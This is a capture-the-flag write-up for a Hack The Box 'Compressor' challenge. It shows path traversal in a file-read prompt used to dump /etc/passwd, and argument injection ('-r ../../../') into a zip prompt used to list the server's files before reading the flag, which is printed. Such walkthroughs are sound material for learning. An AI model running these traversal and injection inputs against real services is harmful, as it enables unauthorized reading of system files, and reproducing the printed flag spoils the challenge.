Compressor

So we are given an endpoint we can netcat into and it presents us with the following:

Compressor
[*] Directory to work in: QqcbsvCcKGxpk7n6JNvqNxPB19gC5OiB
Component List:
+===============+
|               |
|  1. Head  🤖  |
|  2. Torso 🦴   |
|  3. Hands 💪  |
|  4. Legs  🦵   |
|               |
+===============+
[*] Choose component: 1
[*] Sub-directory to work in: QqcbsvCcKGxpk7n6JNvqNxPB19gC5OiB/Head
Actions:

Create artifact
List directory    (pwd; ls -la)
Read artifact     (cat ./)
Compress artifact (zip .zip  )
Change directory  (cd )
Clean directory   (rm -rf ./*)
Exit

Let’s try reading an artifact and passing it something they didn’t intend

[*] Choose action: 3
Insert name you want to read: ../../../../etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
...
ctf:x:1000:1000:1000:/home/ctf:/bin/sh

Great, so we can read arbitrary files!

Actions:

Create artifact
List directory    (pwd; ls -la)
Read artifact     (cat ./)
Compress artifact (zip .zip  )
Change directory  (cd )
Clean directory   (rm -rf ./*)
Exit

[*] Choose action: 1
Insert name: ../
Insert content: #!/bin/bash
Traceback (most recent call last):
File "/home/ctf/artifacts.py", line 104, in
create_file()
File "/home/ctf/artifacts.py", line 74, in create_file
f = open(fname, "a")
IsADirectoryError: [Errno 21] Is a directory: '../'
Actions:

Create artifact
List directory    (pwd; ls -la)
Read artifact     (cat ./)
Compress artifact (zip .zip  )
Change directory  (cd )
Clean directory   (rm -rf ./*)
Exit

So first thought after this was since we can access filepaths seemingly indiscriminately, lets trying zipping them all up together

[*] Choose action: 4
Insert .zip: test.zip
Insert : test
Insert : -r ../../../
adding: test (stored 0%)
adding: ../../../ (stored 0%)
adding: ../../../ctf/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Head/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Hands/ (stored 0%)
adding: ../../../ctf/68ubJQ7pIAFQ3AR5XmnIIyNFlMKU5EXd/Torso/ (stored 0%)
...
adding: ../../../ctf/F9mZ4CfUW9NVXjEwShKzvoNYhq7DNwIb/Torso/ (stored 0%)
adding: ../../../ctf/F9mZ4CfUW9NVXjEwShKzvoNYhq7DNwIb/Legs/ (stored 0%)
adding: ../../../ctf/artifacts.py (deflated 63%)
adding: ../../../ctf/clear.py (deflated 32%)
adding: ../../../ctf/flag.txt (stored 0%)
Actions:

and since it pastes the output we now know where the flag is!

Create artifact
List directory    (pwd; ls -la)
Read artifact     (cat ./)
Compress artifact (zip .zip  )
Change directory  (cd )
Clean directory   (rm -rf ./*)
Exit

[*] Choose action: 3
Insert name you want to read: ../../../ctf/flag.txt
HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}

Flag: HTB{GTFO_4nd_m4k3_th3_b35t_4rt1f4ct5}